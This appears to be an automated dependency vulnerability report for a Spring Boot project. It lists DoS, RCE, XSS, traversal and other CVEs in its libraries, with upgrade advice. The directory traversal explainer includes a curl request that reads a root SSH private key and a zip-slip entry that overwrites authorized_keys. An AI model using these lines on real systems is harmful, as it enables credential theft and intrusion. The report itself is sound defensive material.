Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.yaml:snakeyaml@1.17

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.0.0.

Overview

org.yaml:snakeyaml is a YAML 1.1 parser and emitter for Java.

Affected versions of this package are vulnerable to Denial of Service (DoS) due to missing nested depth limitation for collections.

NOTE: This vulnerability has also been identified as: CVE-2022-38749

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

Two common types of DoS vulnerabilities:

High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade org.yaml:snakeyaml to version 1.31 or higher.

References

Denial of Service (DoS) vulnerability report

high severity

Denial of Service (DoS)

Vulnerable module: org.yaml:snakeyaml
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.yaml:snakeyaml@1.17

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.0.0.

Overview

org.yaml:snakeyaml is a YAML 1.1 parser and emitter for Java.

Affected versions of this package are vulnerable to Denial of Service (DoS) due to missing nested depth limitation for collections.

NOTE: This vulnerability has also been identified as: CVE-2022-25857

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

Two common types of DoS vulnerabilities:

High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade org.yaml:snakeyaml to version 1.31 or higher.

References

Denial of Service (DoS) vulnerability report

high severity

Remote Code Execution (RCE)

Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.3.9.RELEASE.
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.3.9.RELEASE.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Remote Code Execution (RCE). The fix for CVE-2020-9484 was incomplete. When using Apache Tomcat with a configuration edge case that was highly unlikely to be used, the Tomcat instance was still vulnerable to CVE-2020-9494. Note that both the previously published prerequisites for CVE-2020-9484 and the previously published mitigations for CVE-2020-9484 also apply to this issue.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 10.0.2, 9.0.43, 8.5.63, 7.0.108 or higher.

References

Apache Security Advisory

Remote Code Execution (RCE) vulnerability report

medium severity

Arbitrary Code Execution

Vulnerable module: org.yaml:snakeyaml
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.yaml:snakeyaml@1.17

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.0.

Overview

org.yaml:snakeyaml is a YAML 1.1 parser and emitter for Java.

Affected versions of this package are vulnerable to Arbitrary Code Execution in the Constructor class, which does not restrict which types can be deserialized. This vulnerability is exploitable by an attacker who provides a malicious YAML file for deserialization, which circumvents the SafeConstructor class.

The maintainers of the library contend that the application's trust would already have had to be compromised or established and therefore dispute the risk associated with this issue on the basis that there is a high bar for exploitation.

Remediation

Upgrade org.yaml:snakeyaml to version 2.0 or higher.

References

Arbitrary Code Execution vulnerability report

medium severity

Access Restriction Bypass

Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.16.
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.16.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Access Restriction Bypass. If the ROOT (default) web application is configured to use FORM authentication then it is possible that a specially crafted URL could be used to trigger a redirect to an URL of the attackers choice.

The vulnerability is limited to the ROOT (default) web application.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 8.5.93, 9.0.80, 10.1.13, 11.0.0-M11 or higher.

References

Access Restriction Bypass vulnerability report

medium severity

Denial of Service (DoS)

Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.5.15.
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.5.15.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Denial of Service (DoS) when an attacker sends a large number of request parts in a series of uploads or a single multipart upload.

NOTE: After upgrading to the fixed version, the setFileCountMax() must be explicitly set to avoid this vulnerability.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

Two common types of DoS vulnerabilities:

High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 8.5.85, 9.0.71, 10.1.5, 11.0.0-M3 or higher.

References

Denial of Service (DoS) vulnerability report

medium severity

Directory Traversal

Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@1.5.11.RELEASE.
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@1.5.11.RELEASE.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Directory Traversal. Security constraints defined by annotations of Servlets were only applied once a Servlet had been loaded. Because security constraints defined in this way apply to the URL pattern and any URLs below that point, it was possible - depending on the order Servlets were loaded - for some security constraints not to be applied. This could have exposed resources to users who were not authorised to access them.

Details

A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.

Directory Traversal vulnerabilities can be generally divided into two types:

Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.

st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.

If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.

curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa

Note %2e is the URL encoded version of . (dot).

Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as Zip-Slip.

One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.

The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:

2018-04-15 22:04:29 .....           19           19  good.txt
2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 9.0.5, 8.5.28, 8.0.50, 7.0.85 or higher.

References

Directory Traversal vulnerability report

medium severity

Cross-site Scripting (XSS)

Vulnerable module: org.hibernate:hibernate-validator
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.hibernate:hibernate-validator@5.3.6.Final

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.0.0.RELEASE.

Overview

org.hibernate:hibernate-validator is a Hibernate Validator Engine Relocation Artifact.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS). The SafeHtml validator annotation fails to properly sanitize payloads consisting of potentially malicious code in HTML comments and instructions.

Details

A cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.

This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.

Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.

Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, < can be coded as &lt; and > can be coded as &gt; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses < and > as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.

The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.

Types of attacks

There are a few methods by which XSS can be manipulated:

Type	Origin	Description
Stored	Server	The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.
Reflected	Server	The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.
DOM-based	Client	The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.
Mutated		The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.

Affected environments

The following environments are susceptible to an XSS attack:

Web servers
Application servers
Web application environments

How to prevent

This section describes the top best practices designed to specifically protect your code:

Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
Convert special characters such as ?, &, /, <, > and spaces to their respective HTML or URL encoded equivalents.
Give users the option to disable client-side scripts.
Redirect invalid requests.
Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.

Remediation

Upgrade org.hibernate:hibernate-validator to version 6.0.18.Final, 6.1.0.Final or higher.

References

Cross-site Scripting (XSS) vulnerability report

medium severity

Deserialization of Untrusted Data

Vulnerable module: com.google.guava:guava
Introduced through: com.google.guava:guava@21.0

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › com.google.guava:guava@21.0

Remediation: Upgrade to com.google.guava:guava@24.1.1-android.

Overview

com.google.guava:guava is a set of core libraries that includes new collection types (such as multimap and multiset,immutable collections, a graph library, functional types, an in-memory cache and more.

Affected versions of this package are vulnerable to Deserialization of Untrusted Data. During deserialization, two Guava classes accept a caller-specified size parameter and eagerly allocate an array of that size:

AtomicDoubleArray (when serialized with Java serialization)
CompoundOrdering (when serialized with GWT serialization)

An attacker may be able to send a specially crafted request which with then cause the server to allocate all it's memory, without validation whether the data size is reasonable.

Details

Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like Remote Method Invocation (RMI), Java Management Extension (JMX), Java Messaging System (JMS), Action Message Format (AMF), Java Server Faces (JSF) ViewState, etc.

Deserialization of untrusted data (CWE-502), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.

Java deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a popular library (Apache Commons Collection). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.

An attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.

Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).

Remediation

Upgrade com.google.guava:guava to version 24.1.1, 24.1.1-jre or higher.

References

Deserialization of Untrusted Data vulnerability report

medium severity

Access Restriction Bypass

Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@1.5.11.RELEASE.
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@1.5.11.RELEASE.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Access Restriction Bypass. The URL pattern of (the empty string) which exactly maps to the context root was not correctly handled, this caused the constraint to be ignored. It was, therefore, possible for unauthorised users to gain access to web application resources that should have been protected. Only security constraints with a URL pattern of the empty string were affected.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 7.0.85, 8.0.50, 8.5.28, 9.0.5 or higher.

References

Access Restriction Bypass vulnerability report

medium severity

HTTP Request Smuggling

Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.3.9.RELEASE.
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.3.9.RELEASE.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to HTTP Request Smuggling. When responding to new h2c connection requests, Apache Tomcat could duplicate request headers and a limited amount of request body from one request to another meaning user A and user B could both see the results of user A's request.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 10.0.2, 9.0.43, 8.5.63 or higher.

References

HTTP Request Smuggling vulnerability report

medium severity

Information Exposure

Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@1.5.15.RELEASE.
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@1.5.15.RELEASE.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Information Exposure. A bug in the tracking of connection closures can lead to reuse of user sessions in a new connection.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 8.5.32, 9.0.10 or higher.

References

Information Exposure vulnerability report

medium severity

Multipart Content Pollution

Vulnerable module: org.springframework:spring-core
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework:spring-core@4.3.13.RELEASE

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@1.5.10.RELEASE.
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-web@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-webmvc@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-web@7.0.0-M4 › org.springframework:spring-beans@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-webmvc@7.0.0-M4 › org.springframework:spring-beans@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-webmvc@7.0.0-M4 › org.springframework:spring-aop@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-webmvc@7.0.0-M4 › org.springframework:spring-expression@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-webmvc@7.0.0-M4 › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE › org.springframework:spring-core@4.3.13.RELEASE

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@1.5.10.RELEASE.
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-webmvc@7.0.0-M4 › org.springframework:spring-web@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-webmvc@7.0.0-M4 › org.springframework:spring-aop@7.0.0-M4 › org.springframework:spring-beans@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-webmvc@7.0.0-M4 › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-beans@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-webmvc@7.0.0-M4 › org.springframework:spring-web@7.0.0-M4 › org.springframework:spring-beans@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-webmvc@7.0.0-M4 › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-aop@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-webmvc@7.0.0-M4 › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-expression@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE › org.springframework:spring-core@4.3.13.RELEASE

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@1.5.10.RELEASE.
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-webmvc@7.0.0-M4 › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-aop@7.0.0-M4 › org.springframework:spring-beans@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-beans@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-aop@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-expression@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-aop@7.0.0-M4 › org.springframework:spring-beans@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-beans@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
